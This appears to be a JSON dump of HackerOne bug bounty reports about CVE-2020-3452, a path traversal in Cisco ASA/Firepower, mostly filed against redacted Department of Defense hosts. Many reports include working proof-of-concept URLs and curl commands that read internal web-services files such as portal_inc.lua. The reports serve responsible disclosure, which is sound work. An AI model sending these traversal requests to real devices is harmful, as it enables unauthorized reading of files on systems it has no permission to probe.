unauthenticated, remote attacker to perform directory traversal attacks and read sensitive files on the system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-08-05T10:21:56", "type": "hackerone", "title": "U.S. Dept Of Defense: CVE-2020-3452, unauthenticated file read in Cisco ASA & Cisco Firepower.", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2020-09-03T17:23:05", "id": "H1:951508", "href": "https://hackerone.com/reports/951508", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-02-03T02:28:03", "bounty": 0.0, "description": "**Description:**\nA vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.\n## Impact\n\n## Step-by-step Reproduction Instructions\n\nto reproduce run the below curl command, and you will see the content of portal_inc.lua\n\ncurl -ik 'https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../'\n\n## Impact\n\nA successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-10-05T22:03:17", "type": "hackerone", "title": "U.S. Dept Of Defense: https://\u2588\u2588\u2588\u2588 is vulnerable to cve-2020-3452", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2021-05-11T20:18:33", "id": "H1:998925", "href": "https://hackerone.com/reports/998925", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-02-03T02:28:04", "bounty": 0.0, "description": "Hello,\n\nI would like to report Path Traversal issue [ CVE-2020-3452 ] was found on https://\u2588\u2588\u2588\u2588\u2588/.\n\nPOC: https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\n\n## Impact\n\nhttps://nvd.nist.gov/vuln/detail/CVE-2020-3452\n\n## System Host(s)\n\u2588\u2588\u2588\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\nCVE-2020-3452\n\n## Steps to Reproduce\nFollow this URL to see the bug exists --> https://\u2588\u2588\u2588\u2588/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\n\n## Suggested Mitigation/Remediation Actions\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-03-26T14:34:07", "type": "hackerone", "title": "U.S. Dept Of Defense: Path Traversal - [ CVE-2020-3452 ]", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2021-05-11T20:16:50", "id": "H1:1137321", "href": "https://hackerone.com/reports/1137321", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-02-03T02:25:56", "bounty": 0.0, "description": "The following subdomain is vulnerable to CVE-2020-3452, which is an unauthenticated file read in Cisco ASA & Cisco Firepower.\n\n# URL:\nhttps://\u2588\u2588\u2588\u2588/\n\n# Vulnerable URL:\nhttps://\u2588\u2588\u2588/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\n# Resources:\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86\n\n## Impact\n\nThe vulnerability could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system.\n\n## System Host(s)\n\u2588\u2588\u2588\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\nCVE-2020-3452\n\n## Steps to Reproduce\n* Go to https://\u2588\u2588\u2588\u2588\u2588\u2588/+CSCOE+/logon.html\n* Intercept the request with Burpsuite\n* Send the request to Repeater\n* Change the URL path to the following `/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../as` an example to read \"/+CSCOE+/portal_inc.lua\" file.\n* You will get the portal_inc.lua file\n\n## Suggested Mitigation/Remediation Actions\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-06-15T18:52:28", "type": "hackerone", "title": "U.S. Dept Of Defense: [CVE-2020-3452] on \u2588\u2588\u2588\u2588\u2588\u2588\u2588", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2022-04-07T20:06:57", "id": "H1:1234925", "href": "https://hackerone.com/reports/1234925", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-02-03T02:26:13", "bounty": 0.0, "description": "I found out that https://\u2588\u2588\u2588/ was vulnerable to CVE-2020-3452.\n\nThe IP has a SSL certificate pointing to DoD.\n`curl -kv https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/`\n\nOutput:\n```\nServer certificate:\n* subject: \u2588\u2588\u2588\u2588\u2588\n```\n\n## Impact\n\nAnyone can read any file present on the server.\n\n## System Host(s)\n\u2588\u2588\u2588\u2588\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\n\n\n## Steps to Reproduce\nYou can test it by visiting the URL:\nhttps://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\nhttps://\u2588\u2588\u2588\u2588\u2588\u2588\u2588/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua\n\n## Suggested Mitigation/Remediation Actions\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-12-02T21:06:18", "type": "hackerone", "title": "U.S. Dept Of Defense: [CVE-2020-3452] Unauthenticated file read in Cisco ASA", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2022-02-14T21:13:45", "id": "H1:1415825", "href": "https://hackerone.com/reports/1415825", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-02-03T02:27:18", "bounty": 500.0, "description": "The CISCO ASA instance at anyconnect.routematch.com was vulnerable to CVE-2020-3452, allowing an unauthenticated attacker to retrieve arbitrary files on the local filesystem.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-07-10T18:50:53", "type": "hackerone", "title": "Uber: CVE-2020-3452 - unauthenticated file read on anyconnect.routematch.com", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2021-08-05T20:15:54", "id": "H1:1257100", "href": "https://hackerone.com/reports/1257100", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-02-03T02:28:26", "bounty": 0.0, "description": "**Summary:**\nI discovered a vulnerability Read-only path traversal (CVE-2020-3452) at https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588.mil\n\n**Description:**\nA vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device.\n\n## Impact\nAn attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. As an example, this could allow an attacker to impersonate another VPN user and establish a Clientless SSL VPN or AnyConnect VPN session to the device as that user. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.\n\n## Step-by-step Reproduction Instructions\n- In a web browser, navigate to https://\u2588\u2588\u2588\u2588\u2588\u2588.mil/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\n\n- Once URL is fully loaded, you will be prompted to download file `translation-table` that represents `portal_inc.lua` which you can then open and observe its content.\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\n- Alternatively, you can execute the below linux bash terminal command to download that same file `portal_inc.lua`: \n\n```\ncurl -k \"https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588.mil/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\" --output portal_inc.lua \n```\n\n- You can download various internal files using curl flag `--output` to output the binary data to a file:\n \n```\ncurl -k \"https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588.mil/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/session.js&default-language&lang=../\" --output session.js \n```\n\n## Product, Version, and Configuration (If applicable)\nWebApp endpoint\n\n## Suggested Mitigation/Remediation Actions\n- Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.\n- This advisory is available at the following link https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86\n\n## Impact\n\nAn attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. As an example, this could allow an attacker to impersonate another VPN user and establish a Clientless SSL VPN or AnyConnect VPN session to the device as that user. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-08-20T03:31:13", "type": "hackerone", "title": "U.S. Dept Of Defense: Read-only path traversal (CVE-2020-3452) at https://\u2588\u2588\u2588\u2588\u2588\u2588.mil", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2021-04-02T18:42:34", "id": "H1:962908", "href": "https://hackerone.com/reports/962908", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-02-03T03:21:50", "bounty": 0.0, "description": "A vulnerability in the interface of Cisco Adaptive Security Appliance and Cisco Firepower Threat Defense (FTD) was reported to IBM, analyzed and have been remediated. Thank you to Khaled (0xelkomy).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-07-23T14:14:15", "type": "hackerone", "title": "IBM: CVE-2020-3452 Cisco ASA / Firepower Read-Only Path Traversal Vulnerability - https://esccvc.de.ibm.com", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2022-03-11T18:57:27", "id": "H1:938684", "href": "https://hackerone.com/reports/938684", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-02-03T01:38:37", "bounty": 0.0, "description": "Hi team. \n \n# Summary\n\nThe Cisco VPN Service at ```\u2588\u2588\u2588\u2588\u2588\u2588.mil``` is vulnerable to the CVE-2020-3452 vulnerability, which allows path traversing within the web service's file system on the targeted device.\n\n\n \n# Steps to Reproduce\nMake a GET request to:\n```http\nhttps://\u2588\u2588\u2588\u2588\u2588\u2588\u2588.mil/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\n```\n\ncURL command:\n```\ncurl -i -s -k -X $'GET' \\\n -H $'Host: \u2588\u2588\u2588\u2588\u2588.mil' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Referer: https://\u2588\u2588\u2588\u2588\u2588.mil/+CSCOE+/logon.html?fcadbadd=1' -H $'DNT: 1' -H $'Connection: close' -H $'Cookie: webvpnlogin=1; webvpnLang=en' -H $'Upgrade-Insecure-Requests: 1' \\\n -b $'webvpnlogin=1; webvpnLang=en' \\\n $'https://\u2588\u2588\u2588.mil/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../'\n```\n\n..and get the content of the ```portal_inc.lua``` file.\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\n \n\n## Impact\n\nAccording to Cisco, this vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files, however, it has a CVE 7.5 (High) score.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-07-27T11:47:22", "type": "hackerone", "title": "U.S. Dept Of Defense: [\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588.mil] Cisco VPN Service Path Traversal", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2020-10-16T19:48:27", "id": "H1:943717", "href": "https://hackerone.com/reports/943717", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-02-03T01:38:36", "bounty": 0.0, "description": "Hey,\n\nI found out that host `\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588.mil` was vulnerable to CVE-2020-3452.\n\nYou can test it by visiting the URL:\n```\nhttps://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588.mil/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua\n```\n\nTo try it with CURL please run the following command:\n\n```\ncurl -i -s -k -X $'GET' \\\n -H $'Host: \u2588\u2588\u2588\u2588\u2588\u2588\u2588.mil' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' -H $'Sec-Fetch-Site: none' -H $'Sec-Fetch-Mode: navigate' -H $'Sec-Fetch-Dest: document' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \\\n $'https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588.mil/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua'\n```\n\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\nReference:\n* https://www.secpod.com/blog/cve-2020-3452-affecting-85000-cisco-asa-ftd-devices/\n* https://twitter.com/aboul3la/status/1286012324722155525\n\n## Impact\n\nAnyone can read any file present on the server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-08-05T11:26:03", "type": "hackerone", "title": "U.S. Dept Of Defense: [CVE-2020-3452] Unauthenticated file read in Cisco ASA", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2020-10-16T19:49:37", "id": "H1:951530", "href": "https://hackerone.com/reports/951530", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-02-03T02:25:45", "bounty": 0.0, "description": "i found out that https://\u2588\u2588\u2588\u2588\u2588/ was vulnerable to CVE-2020-3452\n\nThe IP has a SSL certificate pointing to \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\ncurl -kv https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588/\n\nOutput;\n```\nServer certificate:\n\u2588\u2588\u2588\n```\n\n## Impact\n\nAnyone can read any file present on the server.\n\n## System Host(s)\n\u2588\u2588\u2588\u2588\u2588\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\nCVE-2020-3452\n\n## Steps to Reproduce\nYou can test it by visiting the URL:\n1. https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua\n2. https://\u2588\u2588\u2588\u2588\u2588/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\n\n## Suggested Mitigation/Remediation Actions\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-04-29T22:45:41", "type": "hackerone", "title": "U.S. Dept Of Defense: [CVE-2020-3452] Unauthenticated file read in Cisco ASA", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2022-05-12T20:03:34", "id": "H1:1555015", "href": "https://hackerone.com/reports/1555015", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-02-03T02:26:05", "bounty": 0.0, "description": "Hello team,\nI hope you're doing well, healthy & wealthy.\n\nI found a CVE-2020-3452 path traversal and here is the explanation.\n\nA vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.\n\n## References\n\n - https://twitter.com/aboul3la/status/1286012324722155525\n - http://packetstormsecurity.com/files/158646/Cisco-ASA-FTD-Remote-File-Disclosure.html\n - http://packetstormsecurity.com/files/158647/Cisco-Adaptive-Security-Appliance-Software-9.11-Local-File-Inclusion.html\n - http://packetstormsecurity.com/files/159523/Cisco-ASA-FTD-9.6.4.42-Path-Traversal.html\n - http://packetstormsecurity.com/files/160497/Cisco-ASA-9.14.1.10-FTD-6.6.0.1-Path-Traversal.html\n - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86\n\n## Impact\n\nA vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.\n\n ** classification:**\n- cvss-metrics: 